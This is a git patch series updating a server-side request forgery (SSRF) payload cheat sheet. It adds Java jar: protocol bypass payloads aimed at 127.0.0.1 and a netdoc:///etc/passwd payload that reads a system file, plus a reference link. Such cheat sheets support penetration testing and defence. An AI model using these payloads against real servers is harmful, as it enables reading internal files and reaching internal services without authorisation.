From 08bc3acb053846aacf837965c2b3574ff9c97752 Mon Sep 17 00:00:00 2001 From: security-is-myth Date: Sat, 7 Nov 2020 22:03:02 +0530 Subject: [PATCH 1/3] update SSRF/README.md with java payloads --- Server Side Request Forgery/README.md | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f96314c..c7613ab 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms ``` +### Bypassing using jar protocol (java only) + +```powershell +jar:scheme://domain/path!/ +jar:http://127.0.0.1!/ +jar:https://127.0.0.1!/ +jar:ftp://127.0.0.1!/ +``` + ## SSRF exploitation via URL Scheme ### File @@ -374,8 +383,8 @@ Content of evil.com/redirect.php: Wrapper for Java when your payloads struggle with "\n" and "\r" characters. ```powershell -ssrf.php?url=gopher://127.0.0.1:4242/DATA -``` +ssrf.php?url=netdoc:///etc/passwd +``` ## SSRF exploiting WSGI From f3066722ee82c21f2b9d40e365f1118a747940d2 Mon Sep 17 00:00:00 2001 From: security-is-myth Date: Sat, 7 Nov 2020 22:07:18 +0530 Subject: [PATCH 2/3] update SSRF/README.md with java payloads --- Server Side Request Forgery/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index c7613ab..152b5fb 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -21,6 +21,7 @@ * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) + * [Bypassing using jar protocol (java only)](#bypassing-using-jar-protocol-java-only) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) * [http://](#http) @@ -249,6 +250,8 @@ make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms ### Bypassing using jar protocol (java only) +Blind SSRF + ```powershell jar:scheme://domain/path!/ jar:http://127.0.0.1!/ From bde7fc738c31fe06eb19b03819929af02007965a Mon Sep 17 00:00:00 2001 From: PwnL0rd Date: Sun, 8 Nov 2020 12:00:35 +0530 Subject: [PATCH 3/3] added link in the reference section --- Server Side Request Forgery/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 152b5fb..ac11920 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -781,3 +781,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) +- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)